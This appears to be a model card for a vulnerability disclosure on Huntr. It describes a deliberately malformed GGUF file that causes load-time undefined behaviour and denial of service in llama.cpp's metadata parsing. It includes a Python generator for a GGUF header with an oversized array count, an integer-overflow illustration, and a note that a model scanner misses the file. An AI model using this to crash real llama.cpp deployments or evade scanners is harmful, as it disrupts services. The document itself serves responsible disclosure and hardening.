---
library_name: llama.cpp
tags:
- security
- model-file-vulnerability
- mfv
- poc
license: mit
model_format: gguf
security_scan: intentionally-malformed
---
## Overview
This repository contains an intentionally malformed GGUF file created to demonstrate unsafe behavior in GGUF metadata parsing within llama.cpp.
This file is not a machine learning model. It is malformed by design and must not be used for inference or deployed in production.
The artifact exists solely for responsible security research, reproducibility, and validation by maintainers and Huntr’s Model File Vulnerability (MFV) triage team.
## Reproducer File

- `poc_array_overflow.gguf`

A minimized GGUF payload (~64 bytes) that triggers load-time undefined behavior during GGUF metadata parsing. The file was minimized with AFL++ (`afl-tmin`) to produce a stable, deterministic reproducer.
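For orientation, the sketch below builds a GGUF header of the same *class* of malformation: an array metadata value whose declared element count vastly exceeds the bytes actually present in the file. This is an illustrative reconstruction, not the byte-for-byte contents of `poc_array_overflow.gguf`; the key name and exact values are hypothetical.

```python
import struct

# GGUF constants per the public GGUF format description.
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_TYPE_UINT32 = 4   # array element type: uint32
GGUF_TYPE_ARRAY = 9    # metadata value type: array


def build_malformed_gguf() -> bytes:
    """Build a tiny GGUF file whose single metadata entry declares an
    array of 2^64 - 1 elements but carries no array payload at all."""
    out = bytearray()
    out += GGUF_MAGIC
    out += struct.pack("<I", GGUF_VERSION)
    out += struct.pack("<Q", 0)                  # tensor count
    out += struct.pack("<Q", 1)                  # metadata key-value count
    key = b"general.poc"                         # hypothetical key name
    out += struct.pack("<Q", len(key)) + key
    out += struct.pack("<I", GGUF_TYPE_ARRAY)    # value type: array
    out += struct.pack("<I", GGUF_TYPE_UINT32)   # element type
    # Declared element count far beyond the bytes actually present:
    out += struct.pack("<Q", 0xFFFFFFFFFFFFFFFF)
    # No array payload follows; the file ends here.
    return bytes(out)


if __name__ == "__main__":
    data = build_malformed_gguf()
    print(f"{len(data)} bytes: {data.hex()}")
```

A naive parser that trusts the declared count will attempt to size or iterate an array billions of times larger than the file itself.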
## Technical Summary
- Format: GGUF (binary)
- Model: Not a model (intentionally malformed)
- Attack surface: GGUF metadata parsing
- Trigger phase: Model load (prior to tensor processing)
Malformed, attacker-controlled metadata values are propagated into GGUF parsing logic, resulting in unsafe arithmetic and undefined behavior during model loading.
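The unsafe arithmetic described above belongs to a well-known class: multiplying an attacker-controlled element count by the element size in fixed-width integer arithmetic can wrap, so a size check or allocation "succeeds" on a tiny value while later code still assumes the huge count. The sketch below simulates that failure mode in Python; it is an illustration of the class, not llama.cpp's actual code, and the function name is hypothetical.

```python
U64_MASK = 0xFFFFFFFFFFFFFFFF  # 2^64 - 1


def alloc_size_u64(count: int, elem_size: int) -> int:
    """Mimic C's unchecked 64-bit multiply: (count * elem_size) mod 2^64."""
    return (count * elem_size) & U64_MASK


# An attacker-supplied count of 2^62 "elements" of 4 bytes each
# (e.g. sizeof(uint32_t)) multiplies out to exactly 2^64, which
# wraps to 0 in 64-bit arithmetic: a zero-byte allocation passes
# any size check, while the parser still believes it has 2^62
# elements to read.
attacker_count = 0x4000000000000000
elem_size = 4
nbytes = alloc_size_u64(attacker_count, elem_size)
print(nbytes)  # prints 0
```

Robust parsers avoid this by checking `count > SIZE_MAX / elem_size` (or using a checked-multiply intrinsic) before computing the product, and by rejecting counts larger than the remaining bytes in the file.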
## Security Impact
This PoC demonstrates:
- Unsafe handling of attacker-controlled GGUF metadata
- Load-time undefined behavior in `gguf.cpp`
- Behavior not detected by automated model scanners
The demonstrated impact is load-time undefined behavior / denial of service. No claims of memory corruption beyond this are made.
## Scanner Behavior
When scanned with ProtectAI's `modelscan`, the file is reported clean, despite reliably triggering load-time undefined behavior when parsed by llama.cpp.
Scanner evidence is provided in the associated Huntr submission comments.
## Intended Use
This artifact is intended only for:
- Maintainer debugging
- MFV vulnerability validation
- Reproduction of unsafe GGUF parsing behavior
- Security hardening against malformed GGUF metadata
## Misuse Warning
This file must not be:
- Used for inference
- Loaded in production systems
- Distributed as a model
- Used outside controlled security testing environments
## Disclosure Context
This repository is part of a Huntr Model File Vulnerability (MFV) disclosure.
It does not correspond to a research model, dataset, or paper.
## Author

- aTmHnTR, security researcher (MFV submission)
## Contact
All vulnerability coordination must occur through Huntr’s MFV reporting system. Public discussion should avoid vulnerability details.